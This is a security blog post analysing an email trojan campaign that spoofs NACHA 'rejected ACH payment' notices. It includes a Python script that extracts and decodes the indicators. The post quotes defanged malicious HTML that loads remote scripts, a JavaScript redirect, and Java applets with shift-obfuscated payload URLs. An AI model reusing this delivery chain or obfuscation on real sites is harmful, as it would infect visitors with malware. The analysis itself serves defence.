Emails regarding rejected ACH payment contain security risk


MX Lab, http://www.mxlab.eu, has started intercepting a new trojan distribution campaign by email, with subjects such as:

Rejected ACH transaction
Rejected ACH payment
Your ACH transfer

The email is sent from spoofed addresses such as the following (note that the "display name" is in fact part of a quoted local part, so the whole string is a single address at nacha.org):

"\"The Electronic Payments Association\" risk.manager"@nacha.org
"\"The Electronic Payments Association\" alerts"@nacha.org
"\"The Electronic Payments Association\" risk"@nacha.org
"\"The Electronic Payments Association\" transfers"@nacha.org
"\"The Electronic Payments Association\" ach"@nacha.org
"\"The Electronic Payments Association\" payment"@nacha.org

The email has the following body:

The ACH transaction (ID: 02710822288793), recently sent from your checking account (by you or any other person), was rejected by the Electronic Payments Association.

Canceled transaction
Transaction ID: 02710822288793
Reason for rejection See details in the report below
Transaction Report report_02710822288793.doc (Microsoft Word Document)

13450 Sunrise Valley Drive, Suite 100
Herndon, VA 20171

2011 NACHA – The Electronic Payments Association

A sample of the email:

The URL behind the "transaction report" link differs from sample to sample, and in some cases it is no longer valid. Some examples:

hxxp://minalimo.com/f9oYYmiY/index.html
hxxp://maerlipinte.ch/LaV4inWa/index.html
hxxp://hotel-sicily.it/aRpcdCjd/index.html

One of the URLs did still return content: hxxp://ftp.samisalami.com/8KQZuSAy/index.html.

Inspecting the HTML source of that page gives the following:

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="hxxp://firstnamestore.com/utn08WYD/js.js"></script>
<script type="text/javascript" src="hxxp://ftp.adamsmarketing.com/VRssE3iH/js.js"></script>
<script type="text/javascript" src="hxxp://mediapoolstarnberg.de/WrqeCaoy/js.js"></script>
<script type="text/javascript" src="hxxp://paolomisirochi.com/nqrmZKRC/js.js"></script>
<script type="text/javascript" src="hxxp://lonnytyler.com/MZF0uXsc/js.js"></script>
<script type="text/javascript" src="hxxp://orquestrachapo.com/jAmCDzeM/js.js"></script>

</html>

As you can see, the page itself does nothing but load several external JavaScript files from unrelated (most likely compromised) hosts. Some of those script URLs are already dead, but the ones still live all return the same one-line redirect: document.location='hxxp://sulusate.com/forum/index.php?showtopic=997439';

That URL in turn serves a page with the following code:

<body>
<applet code='Verifa.class' archive='rhi.jar' width='24' height='22'>
<param name="dest" value="lxxt>33wypywexi2gsq3jsvyq3pseh2tltCwls{jsvyqAvlmrs">
</applet>
</body><body>
<applet code='Ooo.class' archive='Ooo.jar' width='24' height='22'>
<param name="dest" value="lxxt>33wypywexi2gsq3jsvyq3pseh2tltCwls{jsvyqAsfi">
</applet>
</body>

When the URLs are opened in an ordinary web browser (something we do not recommend even trying), the server redirects you to bing.com or another web site, so you will not see this code; the page is only handed out selectively.

So the chain is: a harmless-looking landing page, a JavaScript redirect, and finally a page that loads Java archives (rhi.jar and Ooo.jar) through applet tags. The applet "dest" parameters are obfuscated with a trivial fixed ASCII offset (each character shifted up by 4); undoing the shift yields URLs of the form hxxp://sulusate.com/forum/load.php?showforum=..., i.e. on the same host as the redirect. The risk is that these applets contain malicious code that runs in the browser's Java plugin and fetches whatever "dest" points to. The name Ooo.jar is suggestive of OpenOffice, but the file name means nothing here: it is simply what the attacker chose to call an archive served from a malicious page.
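To turn the three stages quoted above into indicators, the following added example (not code from the MX Lab post) parses the landing page for external script sources, pulls the target out of the one-line redirect, and extracts and decodes the applet "dest" parameters. The HTML and JavaScript strings are reproduced from the post with quotes normalised and the hxxp defanging kept; the helper names are ours. Rather than hard-coding the offset of 4, the decoder infers it from the known plaintext prefix "http", so it also handles a variant of the page that uses a different shift.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Stage 1: the "WAIT PLEASE" landing page quoted in the post (defanged hxxp kept).
LANDING_HTML = """<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="hxxp://firstnamestore.com/utn08WYD/js.js"></script>
<script type="text/javascript" src="hxxp://ftp.adamsmarketing.com/VRssE3iH/js.js"></script>
<script type="text/javascript" src="hxxp://mediapoolstarnberg.de/WrqeCaoy/js.js"></script>
<script type="text/javascript" src="hxxp://paolomisirochi.com/nqrmZKRC/js.js"></script>
<script type="text/javascript" src="hxxp://lonnytyler.com/MZF0uXsc/js.js"></script>
<script type="text/javascript" src="hxxp://orquestrachapo.com/jAmCDzeM/js.js"></script>
</html>"""

# Stage 2: what the still-live js.js files returned, as quoted in the post.
JS_REDIRECT = "document.location='hxxp://sulusate.com/forum/index.php?showtopic=997439';"

# Stage 3: the applet page quoted in the post.
APPLET_HTML = """<body>
<applet code='Verifa.class' archive='rhi.jar' width='24' height='22'>
<param name="dest" value="lxxt>33wypywexi2gsq3jsvyq3pseh2tltCwls{jsvyqAvlmrs">
</applet>
</body><body>
<applet code='Ooo.class' archive='Ooo.jar' width='24' height='22'>
<param name="dest" value="lxxt>33wypywexi2gsq3jsvyq3pseh2tltCwls{jsvyqAsfi">
</applet>
</body>"""


class _TagCollector(HTMLParser):
    """Collects external <script src> URLs and <applet> tags with their 'dest' param."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self.applets = []
        self._applet = None  # applet currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script" and a.get("src"):
            self.scripts.append(a["src"])
        elif tag == "applet":
            self._applet = {"code": a.get("code"), "archive": a.get("archive"), "dest": None}
            self.applets.append(self._applet)
        elif tag == "param" and self._applet is not None and a.get("name") == "dest":
            self._applet["dest"] = a.get("value")

    def handle_endtag(self, tag):
        if tag == "applet":
            self._applet = None


def script_sources(html):
    """External script URLs referenced by a page, in document order."""
    c = _TagCollector()
    c.feed(html)
    return c.scripts


def redirect_target(js):
    """URL from a bare document.location='...' redirect stub, or None."""
    m = re.search(r"document\.location\s*=\s*['\"]([^'\"]+)['\"]", js)
    return m.group(1) if m else None


def decode_dest(value, max_shift=32):
    """Undo a fixed per-character ASCII offset on an applet 'dest' value.

    The offset is inferred from the known plaintext prefix 'http' rather
    than assumed. Returns (shift, decoded_url); raises if no shift fits.
    """
    for shift in range(max_shift + 1):
        if any(ord(ch) < shift for ch in value):
            continue  # would produce a negative code point
        decoded = "".join(chr(ord(ch) - shift) for ch in value)
        if decoded.startswith("http"):
            return shift, decoded
    raise ValueError("no fixed ASCII offset yields an http URL")


def applet_payloads(html):
    """Each applet on the page with its archive and the decoded 'dest' URL."""
    c = _TagCollector()
    c.feed(html)
    out = []
    for ap in c.applets:
        shift, url = decode_dest(ap["dest"])
        out.append({"code": ap["code"], "archive": ap["archive"], "shift": shift, "dest": url})
    return out


def indicator_hosts(*urls):
    """Sorted unique hostnames from a set of (possibly defanged) URLs."""
    hosts = set()
    for u in urls:
        h = urlparse(u.replace("hxxp://", "http://")).hostname
        if h:
            hosts.add(h)
    return sorted(hosts)


if __name__ == "__main__":
    scripts = script_sources(LANDING_HTML)
    hop = redirect_target(JS_REDIRECT)
    for p in applet_payloads(APPLET_HTML):
        print(f"{p['archive']} ({p['code']}) shift={p['shift']} dest={p['dest']}")
    print("hosts:", ", ".join(indicator_hosts(*scripts, hop)))
```

Running it lists the two archives with their decoded load.php URLs and the seven hosts involved in the chain; the script hosts are worth blocking individually, since each one serves the same redirect and the landing page only needs one of them to stay alive.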

This email is a security risk for certain, whether it ends in malware or a phishing attempt, so do not follow any of its URLs or open any attached file.

4 thoughts on "Emails regarding rejected ACH payment contain security risk"

  1. Thank you for the detailed information on this problem. What we really want is a forwarding address to send it to someone that is able to track and prosecute the offender.

  2. I have just had the same email but saying my direct debit transaction was successful. Who do we forward this on to? Thanks

  3. I got an email, but it was from Electronic Payments Association (7306C6333@hgll.com).
    Thanks for the post.
